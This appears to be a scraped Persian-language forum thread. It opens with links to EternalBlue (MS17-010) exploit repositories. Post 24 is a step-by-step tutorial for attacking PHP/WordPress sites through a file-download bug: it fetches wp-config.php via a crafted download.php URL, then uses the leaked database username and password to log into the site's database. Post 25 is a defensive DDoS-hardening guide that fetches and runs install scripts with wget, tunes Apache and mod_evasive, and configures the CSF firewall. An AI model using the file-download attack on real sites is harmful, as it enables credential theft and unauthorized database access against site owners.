استفاده از این اکسپلویت ها پایتون و یا روبی به روی سیستم خود نصب کنید به طور پیشفرض بر روی کالی لینوکس که در تصاویر میبینید نصب میباشد. فایل های ابزار اکسپلویت Eternalblue : GitHub - ElevenPaths/Eternalblue-Doublepulsar-Metasploit GitHub - worawit/MS17-010: MS17-010 GitHub - hanshaze/MS17-010-EternalBlue-WinXP-Win10: EternalBlue Metasploit Port to various Windows Versions from Windows XP SP2 up to Windows 10 Pro
  24. تو این قسمت میخواییم به وب سایت هایی تست نفوذ بزنیم که باگ LFD‌ رو دارن و با استفاده از این باگ به بانک اطلاعاتیشون دسترسی پیدا کنیم و بتوینم فایل هایی که تو وب سایت مورد نظر اپلود شده رو دانلود کنیم. نکته : این تستی که ما میزنیم مخصوص وب سایت هایی هستش که از PHP‌ به عنوان زبان سمت سرور استفاده کردن بیشتر رو وب سایت های وردپرسی تست میکنن خب ماهیت این باگ اینه که شما بدون دسترسی به هاست وب سایت بتونین فایل هایی مثل CONFIG.PHP رو دانلود کنید اولین کاری که میکنین اینه که تارگت مورد نظرتون رو پیدا کنید یعنی یه سایتی که بتونیم روش تست بزنیم (اینجا چون جنبه اموزشی داره پس تارگتی هم وجود نداره فقط یه اسم به عنوان تارگت براتون در نظر میگیرم) تارگت : KOKOTOKO.COM خب ادرس رو تو مرورگر وارد میکنید صب میکنید تا لود شه بهد کد زیر رو به ادرس اضافه میکنید download.php?file-wp-config.php که اگه ادرسمون این باشه KOKOTOKO.COM اینطوری تو مرورگر وارد میکنیم KOKOTOKO.COM/download.php?file-wp-config.php نکته : تو سایت هایی که فایل download.php وجود نداره دیه این کد عمل نمیکنه. خب ما در نظر میگیرم سایتمون این باگ رو داره (همونطوری که خیلی از سایت های وردپرسی این باگ رو دارن) پس کد رو تو مرورگر وارد میکنیم تا اینکه تارگت یه فایل برای دانلود به ما میده (همون پنجره ای که برای دانلود محتوا یا موزیک بهمون میده مث همونه) فایل مورد نظر رو با notepad++ یا ابزار هایی مث دریم ویور open کنید باز که شد یه سری کد php بهتون نشون میده شما کاری که میکنید اینه که یه تابعی رو پیدا میکنید که بالاش به عنوان کد راهنما نوشته mysql hostname اگه بخوام خوشگل بگم اینطوریه : <left> /** MySQL hostname */ define('DB_HOST', 'ادرس هاست رو درونش نوشته '); <left> خب ادرس درون تابع رو کپی میکنید تو url یا بهتر یگم تو مروگر یه تب باز میکنید و ادرس درون تابع رو درونش کپی میکنید و بعدش اینتر میزنید تا یه صفحه براتون باز بشه که داخلش یه پنجره هتسش یه لینک بهتون میده به پایگاه داده مورد نظر خب رو لینک کلیک کنید تا برید به ادرس پایگاه داده یعنی صفحه بانک اطلاعاتی براتون باز میشه حالا اینجا بانک اطلاعاتی از شما یوزنیم و پسورد میخواد کاری که میکنید اینه میایید رو فایل مورد نظر (همون wp-config.php ) میایید تابعی رو پیدا میکنید که در کد راهنمای اون نوشته MySQL database username اگه باز بخوام بهتر بگم اینه <left> define('DB_USER', 'usernamehere'); <left> دوستان یوزر نیم رو داخل تکس باکس مورد نظر کپی میکنید و حالا واسه پسورد میایید این تابع رو پیدا میکنید <left> /** MySQL database password */ define('DB_PASSWORD', 'yourpasswordhere'); <left> پسورد مورد نظر رو داخل پسورد کپی میکنید و بعدش رو دکمه go کلیک میکنید تا بانک مورد نظر باز شه
  25. طریقه نصب: ابتدا بوسیله برنامه Putty وارد SSH سرور مجازی یا اختصاصی خود شوید و دستورات زیر را به ترتیب اجرا نمایید:wget http://www.inetbase.com/scripts/ddos/install.sh chmod 0700 install.sh install.sh/. برای اجرا دستور زیر استفاده میکنیم: sh /usr/local/ddos/ddos.sh تنظیم DOS_Deflate :فایل پیکربندی را با یک ویرایشگر باز میکنیم:nano /usr/local/ddos/ddos.conf مقدار زیر را قرار پیدا و به صورت زیر ویرایش کرده: EMAIL_TO=”your_email@domain.com” بجای your_email@domain.com ایمیل خود را بنویسید، در این موقع، هر IP که Banned بشود به شما اخطار میدهد.هر IP چه مقداردر دقیقه کانکشن داشته باشد: FREQ=5 3 تا ۵ بهترین مقدار برای این پارامتر هست.بیشترین connection که هر IP میتواند داشته باشد را مشخص کنید: NO_OF_CONNECTIONS=100 مقدار بین ۱۰۰ تا ۲۰۰ میتواند بهترین مقدار باشد.در Dos_Deflate توسط APF بن کنید:اگر فایروال APF نصب دارید میتوانید این مقدار را برابر با یک قرار دهید. اگر نه توسط CSF یا … عملیات Ban کردن را انجام میدهید برابر با صفر قرار دهید. APF_BAN=0 اگر میخواهید IP مورد نظر توسط DOS_Deflate بن شود مقدار زیر را برابر با یک قرار دهید در غیر این صورت صفر بگذارید KILL=1 IP Address های متخلف چه مقدار در حالت معلق باقی بمانند؟ BAN_PERIOD=700 بهترین مقدار ۳۰۰ تا ۱۱۰۰ است.۲- بهینه سازی وب سرور Apache :البته پیشنهاد ما این است که شما از وب سرور های قدرتمند دیگری همچون Litespeed یا nginx استفاده کنید.ابتدا با دستور زیر فایل پیکربندی آپاچی وب سرور را پیدا کنید: locate httpd.conf مقدار Timeout را کمتر کنید: Timeout 200 مقدار KeepAliveTime را کمتر کنید:KeepAliveTime به معنای حداکثر انتظار وب سرور برای پاسخ به کاربر میباشد. KeepAliveTime 10 قابلیت KeepAlive را خاموش کنید:KeepAlive Off اگریک Connection بیشتر از یک درخواست دارد به طور مدام به آن اجازه ندهد. در واقع KeepAlive وظیفه اش زنده نگه داشتن Connection است. KeepAlive Off مقدار MaxClients را کمتر کنید:MaxClients به معنای : بیشترین تعداد پروسس هایی که هر Client میتواند داشته باشد. MaxClients 50 نصب و پیکربندی mod_evasive یکی از راه های مقابله با حملات Dos استفاده از mod_evasive است. این ابزار یک ماژول تحت Apache و برای سرورهای لینوکس است که درخواست ها را کنترل می کند و از جاری شدن سیل عظیم آن (Flood) جلوگیری می کند. این کار بر اساس تعداد درخواست های مجاز تعیین شده در بخش تنظیمات صورت می گیرد. این ماژول آدرس IP که بیش از حد مجاز درخواست می فرستد را بصورت پیش فرض برای ۱۰ دقیقه مسدود (Block) می کند که این مقدار نیز قابل تغییر است. mod_evasive نسخه به روز شده همان ماژول mod_dosevasive است که در تاریخ Feb 1 2005 بصورت استفاده عمومی ارائه شده است. نکته: این ماژول مشکلاتی را با Frontpage Server Extensions دارد و احتمال از کار انداختن آن را ایجاد می کند.در ضمن پیشنهاد میشود Frontpage بر روی سرور خود پاک و یا غیر فعال کنید. cd /usr/local/src wget http://www.zdziarski.com/projects/mo..._1.10.1.tar.gz tar -zxvf mod_evasive_1.10.1.tar.gz cd mod_evasive apxs -cia mod_evasive20.c در فایل پیرکبرندی وب سرور آپاچی httpd.conf مقادیر زیر را قرار دهید:اگر نسخه آپاچی شما ۲٫۰٫x هست : <IfModule mod_evasive20.c> DOSHashTableSize 3097 DOSPageCount 5 DOSSiteCount 100 DOSPageInterval 2 DOSSiteInterval 2 DOSBlockingPeriod 10 DOSBlockingPeriod 600 </IfModule> اگر نسخه آپاچی وب سرور شما ۱٫۰x هست: <IfModule mod_evasive.c> DOSHashTableSize 3097 DOSPageCount 5 DOSSiteCount 100 DOSPageInterval 2 DOSSiteInterval 2 DOSBlockingPeriod 600 </IfModule> سپس وب سرور خود را restart دهید. service httpd restart 3- دیواره آتشین نصب کنید.اگر از CSF استفاده میکنید ، میتوانید تنظیمات زیر را اعمال نمایید:وارد تنظیمات فایروال شوید، CT_LIMIT = تعداد کانکشن هایی که هر کلاینت با هر IP میتواند داشته باشد را تعیین میکند. CT_INTERVAL = هر چه مدت، چه مدت دیواره آتشین شما کانکشن ها و وضعیت را بررسی کند. CT_EMAIL_ALERT هر IP که بن میشود یا .. به شما گزارش بدهد یا خیر (از طریق ایمیل) CT_PERMANENT این مقدار را اگ برابر با صفر قراردهید هر IP نمیتواند به طور همیشه بن باشد. اگر یک قرار دهید . هر IP که بن میشود واسه همیشه بن خواهد شد. CT_BLOCK_TIME = IP که بن میشود چه مدت معلق بماند؟! مقدار ۱۸۰۰ یا ۵۰۰ مقداری خوبی است. CT_SKIP_TIME_WAIT برابر با صفر باشد. CT_STATES = آمار از سرور به شما ارائه میدهد. اینکه هر IP چند کانکشن دارد و … CT_PORTS پورت ها را با , از هم جدا کنید. مثلا: ۸۰,۴۴۳,۲۵۴- یافتن حملات و درخواست هایی از نوع sync netstat -an|grep :80 با دستور فوق تمام کانکشن هایی که به پورت ۸۰ وصل هستند را نمایش میدهد ، سپس دستور زیر را وارد میکنیم تا ببنیم کجا با SYN_RECV شروع شده است netstat -an|grep SYN_RECV تعداد کانکشن های آپاجی و تعداد کانکشن های SYN_RECV : netstat -an|grep :80|wc -l netstat -an|grep SYN_RECV|wc -l و برای حذف این برنامه میتوانید از دستورات زیر بهره بگیرید :wget http://www.inetbase.com/scripts/ddos/uninstall.ddoschmod 0700 uninstall.ddosuninstall.ddos/.
×
×
  • جدید...